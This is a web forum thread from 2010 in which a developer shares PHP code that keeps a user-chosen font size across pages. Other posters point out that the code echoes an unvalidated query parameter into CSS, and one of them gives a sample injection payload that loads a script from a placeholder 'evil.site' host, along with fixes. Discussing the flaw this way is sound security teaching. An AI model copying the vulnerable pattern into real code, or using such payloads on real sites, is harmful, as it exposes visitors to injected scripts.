Accessability with dynamic font size and page colouring

Discussion in 'Web Design and Development' started by carlosbutler, May 9, 2010.

  1. carlosbutler macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #1
    I am trying to make a website more accessable to as many users, so for people with bad eye, for example. I am trying to include in my php scripts spmething that will remeber certain properties like font size. Although when I load a new page it reverts back to the default size. I tried doing it with session variables, but can't quite get it to work. Psudeo code:

    isset session variable font size
    session variable font size = number

    css style font = number

    that's it. Obiously when you load a new page, the session variable should still be there, but it isn't. Don't really understand why. Any better ideas?
     
  2. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #2
    Seeing the actual code may help for any typos and the like. I've used cookies in the past for this type of setup.
     
  3. Cabbit macrumors 68020

    Cabbit

    Joined:
    Jan 30, 2006
    Location:
    Scotland
    #3
    Do you have Session Start at the top of every php file?
     
  4. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #4
    Well after trying again I managed to get it done:
    PHP:
    session_start();
    if(!isset(
    $_GET['fontGET']) && !isset($_SESSION['font'])){
        
    $_SESSION['font'] = 14;
    }
    if(isset(
    $_GET['fontGET'])){
        
    $_SESSION['font'] = $_GET['fontGET'];
    }
    $fontSmaller $_SESSION['font']-2;
    $fontBigger $_SESSION['font']+2;
    ...
    HTML:
    #mainBody {
    	font-size:<?php echo $_SESSION['font']; ?>px;
    }
    
    T- and T+ are links ?fontGET=xx. Although if you have any better ways let me know.
     
  5. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #5
    Just want to point out a big security vulnerability in your code. If someone were to send the value,
    HTML:
    </style><body><iframe src="evil.site/evil.script"></iframe>
    in the fontGET argument (which is very easy to do) someone could essentially take over the site and deliver viruses/spyware/etc to your visitors, compromise user data, and other nasty things.

    Doing a basic check that the value is an integer (is_int()) will protect you from this attack.
     
  6. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #6
    Okay, thanks. Although would that not only be on their machine? I thought session variables were kept locally?

    Even if someone typed in www.example.com/?fontGET=<body><iframe src="evil.site/evil.script"></iframe>? or am I overseeing something?

    Also, would that even be valid HTML:
    HTML:
    #mainBody {
    	font-size:<iframe src="evil.site/evil.script"></iframe>px;
    }
    
     
  7. 7on macrumors 601

    7on

    Joined:
    Nov 9, 2003
    Location:
    Dress Rosa
    #7
    No but he wrote a </style> in there so it's be

    HTML:
    #mainBody {
    	font-size:
    </style>
    <body>
    <iframe src="evil.site/evil.script"></iframe>px;
    }
    
    [/QUOTE]
     
  8. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #8
    [/QUOTE]

    Ah yes, I never realised. Although I meant having the two open body tags.
     
  9. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #9
    For this limited example, yes, it would only effect the person entering that in. The example could be taken further though and cause a more permanent change to your site by writing files to your web host or over writing existing files on the web host. Or it could be taken advantage of by using CSRF (other reading for CSRF) or XSS techniques. I didn't want to give too malicious of an example, but I've read a few PHP security books that do include some nasty code that could compromise your current code. Never trust data coming from users, especially since there's such an easy fix.
     
  10. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #10
    Crikey never even thought of doing something like that. Surely that then means you could include a php scripts from some other server?

    Out of interest, if you did want to pass a string of letters, such as this forum does, how would you go about that?
     
  11. splitpea macrumors 6502a

    Joined:
    Oct 21, 2009
    Location:
    Among the starlings
    #11
    They can only change your files if you are actually executing based on user-input code, or taking advantage of vulnerabilities in the language itself.

    For strings, depending on the use, either check them against a list of known-good strings (a MUST if you're, for instance, passing the name of an include file -- one of those cases in which they can rewrite your files if the server isn't configured perfectly... and which shouldn't be done anyway: there are better ways to accomplish that) or if you're outputting the string to the browser, run it through an HTML-escaping routine (or the equivalent if you're using it to write Javascript, CSS, etc).
     
  12. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #12
    For a forum-like environment, HTML that's entered in is displayed as typed (in HTML-entity form), so it doesn't show up as actual HTML tags in the post. Some web apps will only allow specific HTML tags to be used by visitors using a function like strip_tags().

    Here is a PHP security guide primer that has some decent information about understanding the security issue. It only talks about things at a basic level, but makes for a good starting point and covers the basics every PHP developer should know.
     
  13. Cabbit macrumors 68020

    Cabbit

    Joined:
    Jan 30, 2006
    Location:
    Scotland
    #13
    Oh just a little hint to help your accessibility drive.
    Put
    HTML:
    <a class="contentSkip" href="#content">Skip to content</a>
    Right at the top of your page before any content and navigation, the class is so you can style it out of the page completely by making it invisible or something. I use opacity 0.1;.

    And at your content put the anchor for it. Something i have noticed that really helps if you put before this skip, "Content Updated: 1 hours ago" or something to that effect it saves a lot of time if i am looking for new posts to read.
     

Share This Page